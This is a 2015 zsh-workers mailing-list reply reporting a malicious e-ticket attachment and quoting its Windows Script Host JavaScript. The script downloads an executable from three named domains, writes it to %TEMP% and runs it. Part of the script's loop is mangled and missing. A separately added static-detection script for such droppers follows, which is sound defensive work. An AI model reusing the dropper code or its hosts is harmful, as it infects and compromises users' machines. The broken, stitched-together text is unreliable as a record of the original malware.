List-Id: Zsh Workers List
X-Seq: 37269
Date: Tue, 1 Dec 2015 14:13:27 +0100
From: Markus Trippelsdorf
To: Peter Stephenson
Cc: Zsh Hackers' List
Subject: Re: zsh-workers/37266 has a malicious attachment
Message-ID: <20151201131327.GB315@x4>
References: <20151201122412.7d355172@pwslap01u.europe.root.pri>
In-Reply-To: <20151201122412.7d355172@pwslap01u.europe.root.pri>

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked.
Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
  for (var i = ld; i 1000) {
          dn = 1;
          xa.position = 0;
          xa.saveToFile(fn + n + ".exe", 2);
          try {
            ws.Run(fn + n + ".exe", 1, 0);
          } catch (er) {};
        };
        xa.close();
      };
      if (dn == 1) {
        ld = i;
        break;
      };
    } catch (er) {};
  };
};

-- 
Markus
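
Added example, not part of the original message or of any mail system mentioned in the thread: a static triage check that a mail gateway or analyst could run over a .js attachment to flag the capability chain visible in the script above (WScript.Shell, MSXML2.XMLHTTP, ADODB.Stream, saveToFile, Run) and pull out defanged hostname candidates. The function names, verdict labels and the sample input are assumptions made for illustration; the sample is constructed and uses reserved example domains.

```javascript
// Static triage for Windows Script Host (.js) attachments. Nothing is executed;
// the script text is only pattern-matched.
const CAPABILITIES = {
  shell: /CreateObject\(\s*["']WScript\.Shell["']\s*\)/i,
  http: /CreateObject\(\s*["']MSXML2\.XMLHTTP["']\s*\)/i,
  stream: /CreateObject\(\s*["']ADODB\.Stream["']\s*\)/i,
  saveFile: /\.saveToFile\s*\(/i,
  run: /\.Run\s*\(/i,
};
const HOST = /^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$/i;

// Collect hostname-looking tokens from string literals, including
// space-separated lists of the form "a.example b.example".split(" ").
function hostCandidates(src) {
  // Drop CreateObject(...) arguments first: ProgIDs such as WScript.Shell
  // would otherwise pass the hostname pattern.
  const body = src.replace(/CreateObject\([^)]*\)/gi, "");
  const hosts = new Set();
  for (const m of body.matchAll(/"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g)) {
    for (const tok of (m[1] || m[2] || "").split(/\s+/)) {
      if (HOST.test(tok)) hosts.add(tok.toLowerCase());
    }
  }
  return [...hosts];
}

// Defang so the values can be pasted into tickets and mail without linking.
const defang = (h) => h.replace(/\./g, "[.]");

function triage(src) {
  const hits = Object.keys(CAPABILITIES).filter((k) => CAPABILITIES[k].test(src));
  // All five together: fetch over HTTP, write the response to disk, run it.
  const chain = hits.length === Object.keys(CAPABILITIES).length;
  const verdict = chain ? "download-and-execute" : hits.length ? "suspicious" : "no-indicators";
  return { verdict, hits, hosts: hostCandidates(src).map(defang) };
}

// Constructed, non-functional sample; hostnames are reserved example domains.
const SAMPLE = [
  'var b = "files.example.com cdn.example.net".split(" ");',
  'var ws = WScript.CreateObject("WScript.Shell");',
  'var xo = WScript.CreateObject("MSXML2.XMLHTTP");',
  'var xa = WScript.CreateObject("ADODB.Stream");',
  'xa.saveToFile(fn + n + ".exe", 2);',
  'ws.Run(fn + n + ".exe", 1, 0);',
].join("\n");
const BENIGN = 'var x = new XMLHttpRequest(); x.open("GET", "https://example.org/api");';

console.log(triage(SAMPLE), triage(BENIGN));
```

A "suspicious" verdict means only part of the chain was found; string-built or encoded ProgIDs will not match these literal patterns, so a clean result is not proof that an attachment is harmless.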